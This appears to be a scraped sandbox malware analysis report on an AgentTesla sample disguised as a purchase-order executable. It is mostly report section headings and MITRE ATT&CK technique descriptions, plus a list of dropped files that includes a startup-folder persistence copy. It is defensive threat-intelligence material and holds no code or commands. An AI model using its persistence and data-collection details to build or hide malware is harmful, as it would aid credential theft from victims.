Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Drawing specification and June PO #07329.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Drawing specification and June PO #07329.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
Drawing specification and June PO #07329.exe

Function 07D61127 Relevance: 5.6, Instructions: 5649
COMMON

Function 07D61140 Relevance: 5.6, Instructions: 5633
COMMON

Function 08711408 Relevance: 5.2, Instructions: 5170
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre